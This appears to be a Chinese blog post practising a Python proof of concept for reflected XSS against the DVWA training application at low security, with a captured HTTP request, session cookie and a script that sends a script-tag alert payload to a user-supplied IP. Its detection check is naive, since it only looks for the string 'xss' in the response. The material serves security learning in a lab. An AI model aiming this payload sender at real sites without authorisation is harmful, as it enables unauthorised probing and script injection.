• python DVWAXSSPOC练习

    XSS反射性低难度

    数据包

    1. GET /dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E HTTP/1.1
    2.  
    3. Host: 10.9.75.161
    4.  
    5. Upgrade-Insecure-Requests: 1
    6.  
    7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    8.  
    9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    10.  
    11. Referer: http://10.9.75.161/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
    12.  
    13. Accept-Encoding: gzip, deflate
    14.  
    15. Accept-Language: en-US,en;q=0.9
    16.  
    17. Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3
    18.  
    19. Connection: close
    20.

    构建url

    target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'

    构建header

    1.   headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    2.             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    3.              "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    4.     }

    终极POC

    1. import requests
    2. def XSS(url):
    3.     target=url+'/dv/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E'
    4.     headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    5.             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    6.              "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
    7.     }
    8.     try:
    9.         res=requests.get(url=target,headers=headers)
    10.         print(res.text)
    11.         if "xss" in res.text:
    12.             print('[+]',url,'存在XSS漏洞')
    13.         else:
    14.             print('[-]',url,'不存在XSS漏洞')
    15.     except Exception as e:
    16.         print('Error')
    17.         print(e)
    18. if __name__ == '__main__':
    19.     url=input('请输入目标IP地址:')
    20.     XSS('http://'+url)

    运行结果

  • 相关阅读:
    社保和五险一金那些事
    Kubernetes 系统化学习之 基本概念篇
    K8S之Job和CronJob控制器
    java计算机毕业设计springboot+vue+elementUI永加乡精准扶贫信息管理系统
    【虹科干货】Redis Enterprise 自动分层技术:大数据集高性能解决方案
    戏说领域驱动设计(五)——子域
    MybatisPlus
    【JavaScript系列】01_初识JS
    After Effects动态图形和数据可视化
    当PBlaze6 6920 Raid阵列遇到FC SAN
  • 原文地址:https://blog.csdn.net/weixin_56537388/article/details/132796219